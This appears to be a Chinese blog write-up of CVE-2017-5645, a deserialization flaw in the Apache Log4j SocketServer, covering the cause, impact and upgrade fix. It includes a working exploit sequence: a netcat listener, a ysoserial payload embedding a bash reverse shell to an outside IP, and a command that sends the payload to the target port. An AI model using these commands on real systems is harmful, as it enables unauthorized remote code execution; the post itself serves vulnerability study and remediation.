CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

世界尽头与你2026-02-04 9:10

CVSS评分:9.8(严重)

CVE-2017-5645_ Apache Log4j Server 反序列化命令执行漏洞

  • [1. 漏洞原理](#1. 漏洞原理)
  • [2. 漏洞危害](#2. 漏洞危害)
  • [3. 漏洞修复](#3. 漏洞修复)

1. 漏洞原理

Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。Apache Log4j 2.8.2之前的2.x版本中存在代码问题漏洞。攻击者可利用该漏洞执行任意代码。

漏洞利用链:

plain 复制代码 
攻击者
  ↓
TCP / UDP 发送恶意序列化对象
  ↓
Log4j SocketServer
  ↓
ObjectInputStream.readObject()
  ↓
Gadget chain
  ↓
任意代码执行

攻击者需要满足条件:

  • 目标服务器开启并监听 Log4j Socket Server(TCP 或 UDP)端口
  • 可以向服务器发送任意数据包

具体利用路径概括如下:

  1. 攻击者构造特制的 Java 序列化对象字节流,包含恶意链
  2. 通过网络向 Log4j 的 socket 端口发送该 payload
  3. Log4j 接收到数据后反序列化该对象
  4. 恶意对象触发执行攻击者指定的系统命令

step:

1、nc 监听本地

https://www.revshells.com/

bash 复制代码 
nc -lvnp 9001

2、生成恶意payload

bash 复制代码 
java -jar ysoserial.jar CommonsCollections5 "sh -i >& /dev/tcp/172.30.22.210/9001 0>&1" > payload.bin

3、发送,反弹shell

bash 复制代码 
nc 172.xxx.xxx.xxx 5007 < payload.bin

2. 漏洞危害

微步标记为高风险,重点两高一弱漏洞:

该漏洞可导致直接RCE,尽快修复

3. 漏洞修复

  • 升级到 Apache Log4j 2.8.2 或以上 版本
相关推荐
一个在高校打杂的3 分钟前
honeypot之opencanary(轻量化蜜罐)
linux·网络安全·网络攻击模型·安全威胁分析·策略模式
一个脚本boy4 分钟前
攻防世界misc简单难度1-20题详细解法
网络安全
谪星·阿凯1 小时前
Linux提权全攻略博客
linux·运维·服务器·网络安全
君如风军如风1 小时前
等保2.0安全通用要求第三级别之安全物理环境
网络安全·等级保护·等保2.0·安全合规·gb/t 22239
顧棟1 小时前
Apache-doris 集群扩缩容迁移方案
apache
中科固源2 小时前
从低空协议劫持实战看 MAVLink 二进制审计在飞控发布环节的必要性
网络安全·模糊测试·低空安全
顧棟3 小时前
Apache-doris-2.0.2原地滚动升级3.1.4方案
apache
ew452183 小时前
【Java】Apache POI 终极封装:支持多表格循环、图片插入、日期格式化的Word导出工具类(兼容POI3.17+)
java·word·apache
小皮蛋儿子4 小时前
mac 微信双开
linux·服务器·apache
努力成为AK大王13 小时前
超全 Maven 核心知识点总结
log4j
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法05【AI】2026 年具身智能模型和世界模型总结06装上就回不去了:CodeGraph 让 AI 编程效率飙升 92%,它到底做了什么?07几个好用的ip纯净度检测网站08裂开!ChatGPT 居然开始要手机号验证,附详细解决方法09用了半年 OpenRouter,我换到了 Ofox.ai — 两个 AI API 聚合平台的真实对比10codex app每次打开重连5次Reconnecting问题解决